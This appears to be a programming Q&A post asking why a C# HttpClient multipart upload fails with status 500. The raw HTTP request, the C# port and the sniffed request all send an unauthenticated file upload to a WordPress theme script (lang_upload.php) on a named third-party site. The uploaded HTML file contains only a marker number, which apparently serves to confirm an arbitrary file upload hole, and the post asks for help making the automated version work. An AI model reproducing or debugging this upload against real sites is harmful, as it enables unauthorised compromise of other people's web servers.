# Uploading a File using boundary Content-Type Http Client C#

Tags: c#, httpclient

Here is my Raw Request which will upload a file and it works well using burp or similar programs:

```
POST /wp-content/themes/westand/include/lang_upload.php HTTP/1.1
Host: visionsupport.org.uk
Content-Type: multipart/form-data; boundary=--------------------------7a1b900e742db1f3dhgaskhd3232157
Content-Length: 262

--------------------------7a1b900e742db1f3dhgaskhd3232157
Content-Disposition: form-data; name="mofile[]"; filename="file.html"
Content-Type: text/html

<html>
<h1>9856485823646</h1>
</html>
--------------------------7a1b900e742db1f3dhgaskhd3232157--
```

I have converted it into C# http client:

```
HttpClient client = new HttpClient();
using (var multipartFormContent = new MultipartFormDataContent())
{
    var content = new StreamContent(File.OpenRead("C:\\Users\\User\\Desktop\\file.html"));
    content.Headers.Add("Content-Disposition", "form-data; name=\"mofile[]\"; filename=\"file.html\"");
    content.Headers.ContentType = new MediaTypeHeaderValue("text/html");
    multipartFormContent.Add(content, name: "mofile[]", fileName: "file.html");

    var response = client.PostAsync("https://visionsupport.org.uk/wp-content/themes/westand/include/lang_upload.php", multipartFormContent).Result;
}
```

I have sniffed the HTTP client request and here is the raw request created by HTTP client:

```
POST /wp-content/themes/westand/include/lang_upload.php HTTP/1.1
Host: visionsupport.org.uk
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary="5d12e753-0983-43b0-97da-af063bb70e5c"
Content-Length: 226

--5d12e753-0983-43b0-97da-af063bb70e5c
Content-Disposition: form-data; name="mofile[]"; filename="file.html"
Content-Type: text/html

<html>
<h1>9856485823646</h1>
</html>
--5d12e753-0983-43b0-97da-af063bb70e5c--
```

it is a bit different than the original.
and it gives me '500' status code. where is the problem? how can I handle such a raw request?